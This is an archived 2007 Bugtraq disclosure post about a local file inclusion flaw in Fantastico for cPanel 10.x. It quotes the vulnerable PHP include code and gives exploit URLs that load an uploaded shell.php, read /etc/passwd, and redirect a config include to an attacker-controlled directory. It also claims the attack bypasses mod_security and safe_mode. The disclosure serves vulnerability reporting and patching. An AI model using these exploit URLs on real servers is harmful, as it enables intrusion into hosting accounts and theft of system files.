Fantastico In all Version Cpanel 10.x <= local File Include

To: submit@xxxxxxxxxxx
Subject: Fantastico In all Version Cpanel 10.x <= local File Include
From: "z3r0 z3r0.2.z3r0" <z3r0.2.z3r0@xxxxxxxxx>
Date: Sun, 11 Mar 2007 10:21:53 -0800
Cc: bugtraq@xxxxxxxxxxxxxxxxx
Dkim-signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:cc:mime-version:content-type:content-transfer-encoding:content-disposition; b=VhqN8De8EE7aG81By8GaMMjucZw4SgqtzvascQLzpQl1T95ZWRi4z9nJbXTIom9bKts26NaOb/0PrU1FpqJ/R6zsT+VDPKqKP7wYoz8r7gI/fBgILrfs6mixCD61rEraSMAC5oMkBgZONkqNPHqKaijmwam9CPj2nDRGgtYKsKA=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:cc:mime-version:content-type:content-transfer-encoding:content-disposition; b=s3fwCtB5SLju7DRFzPX75v1HelEAs7/bzYpQNwpzEUUnif1oKCSGcAO06/ovruDx3JZmYziWQ1YLFvyq8Em3xQVLkDHK0X3vHx1Q6hZEOrrxX0FGaaORXI19UJMxb33M4pQmi26hnYM1Nwl5Tclqg2vL6V3rQndoKl/vygnD9Bs=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

##############################################################
Fantastico In all Version Cpanel 10.x <= local File Include

##############################################################to the
Note : Preparations php.ini in Cpanel  hypothetical and They also in
all WebServer

Must provide username  And pass  and login  :2082
To break the strongest protection   mod_security  & safe_mode:On  &
Disable functions :  All NONE



Vulnerable Code ( 1  ) :
 if(is_file($userlanguage))
   {
       include ( $userlanguage );

In

http://xx.com:2082/frontend/x/fantastico/includes/load_language.php



Exploit  1 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/home/user/shell.php

id
uid=32170(user) gid=32170(user) groups=32170(user)

Exploit  2 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd

###################################################
Vulnerable Code ( 2  ) :

$localmysqlconfig=$fantasticopath . "/includes/mysqlconfig.local.php";
if (is_file($localmysqlconfig))
        {
        include($localmysqlconfig);

in
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php
And also many of the files of the program

Exploit :
First  Create directory Let the name (/includes/)
and upload Shell.php  in (/includes/) Then  rename
mysqlconfig.local.php       D:

:::xploit::::
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=/home/user/



###################################################


Discoverd By : cyb3rt & 020
###################################################

Special Greetings :_ Tryag-Team  &  4lKaSrGoLd3n-Team
###################################################

Prev by Date: Re: Wiki Remote Authentication Bypass Vulnerability
Next by Date: GuppY v4.0 remote del files/index
Previous by thread: AssetMan 2.4a <= (download_pdf.php) Remote File Disclosure Vulnerability
Next by thread: GuppY v4.0 remote del files/index
Index(es):
- Date
- Thread